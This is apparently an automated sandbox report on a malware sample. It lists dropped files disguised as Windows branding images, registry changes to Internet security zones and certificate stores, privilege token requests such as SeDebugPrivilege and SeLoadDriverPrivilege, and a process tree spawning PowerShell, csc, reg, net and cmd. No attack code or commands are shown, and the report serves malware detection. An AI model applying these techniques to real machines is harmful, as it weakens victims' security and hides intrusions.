Loads dropped DLL

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_zx3sgsyg.0ou.psm1 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIF7DA.tmp C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\branding\mediasvc.png C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\mediasvc.png C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\wupsvc.jpg C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIF7EB.tmp C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_1cm2mslq.hrb.ps1 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIF77A.tmp C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIF7C9.tmp C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\mediasrv.png C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIF7FB.tmp C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\branding\wupsvc.jpg C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\Basebrd C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\ShellBrd C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\branding\mediasrv.png C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\System32\Wbem\WMIC.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\DisplayName = "Trusted sites" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\1200 = "3" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\CurrentLevel = "69632" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\CurrentLevel = "70912" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Description = "This zone contains Web sites that could potentially damage your computer or data." C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\16\52C64B7E C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Icon = "shell32.dll#0018" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\LowIcon = "inetcpl.cpl#005423" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Flags = "3" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\PMDisplayName = "Internet [Protected Mode]" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\1400 = "3" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\knownfolder = "0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\1400 = "0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0\2ba02e083fadee33 = 2c0053006f006600740077006100720065005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073002c004900450035005f00550041005f004200610063006b00750070005f0046006c00610067002c0000000100080035002e0030000000000000000000 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0.map\57fd7ae31ab34c2c = ",33,HKCU,SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\Cache\\Extensible Cache," C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\PMDisplayName = "Trusted sites [Protected Mode]" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\LowIcon = "inetcpl.cpl#005424" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\CurrentLevel = "0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\DisplayName = "Computer" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\LowIcon = "inetcpl.cpl#005424" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\file = "3" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\LowIcon = "inetcpl.cpl#005426" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\Icon = "shell32.dll#0016" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\1200 = "0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\DisplayName = "Local intranet" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\CurrentLevel = "66816" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\1200 = "3" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0.map\e1be3f182420a0a0 = ",33,HKCU,Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones," C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\ftp = "3" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Description = "This zone contains all Web sites that are on your organization's intranet." C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Icon = "inetcpl.cpl#00004480" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\DisplayName = "Restricted sites" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\system32\reg.exe N/A

Runs net.exe

Script User-Agent

Description Indicator Process Target
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4796 wrote to memory of 4936 N/A C:\Users\Admin\AppData\Local\Temp\83d119a963e7050995f9bf6be8841b95.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4796 wrote to memory of 4936 N/A C:\Users\Admin\AppData\Local\Temp\83d119a963e7050995f9bf6be8841b95.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4936 wrote to memory of 5104 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 4936 wrote to memory of 5104 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 5104 wrote to memory of 3268 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 5104 wrote to memory of 3268 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 4936 wrote to memory of 3392 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4936 wrote to memory of 3392 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4936 wrote to memory of 416 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4936 wrote to memory of 416 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4936 wrote to memory of 1100 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4936 wrote to memory of 1100 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4936 wrote to memory of 4716 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 4936 wrote to memory of 4716 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 4936 wrote to memory of 3344 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 4936 wrote to memory of 3344 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 4936 wrote to memory of 3340 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 4936 wrote to memory of 3340 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 4936 wrote to memory of 4104 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\net.exe
PID 4936 wrote to memory of 4104 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\net.exe
PID 4104 wrote to memory of 1008 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 4104 wrote to memory of 1008 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 4936 wrote to memory of 3604 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 4936 wrote to memory of 3604 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 3604 wrote to memory of 3708 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 3604 wrote to memory of 3708 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 3708 wrote to memory of 2884 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 3708 wrote to memory of 2884 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 2884 wrote to memory of 4260 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2884 wrote to memory of 4260 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 4936 wrote to memory of 740 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 4936 wrote to memory of 740 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 740 wrote to memory of 3848 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 740 wrote to memory of 3848 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 3848 wrote to memory of 3940 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 3848 wrote to memory of 3940 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 3940 wrote to memory of 3440 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 3940 wrote to memory of 3440 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 4264 wrote to memory of 3684 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 4264 wrote to memory of 3684 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
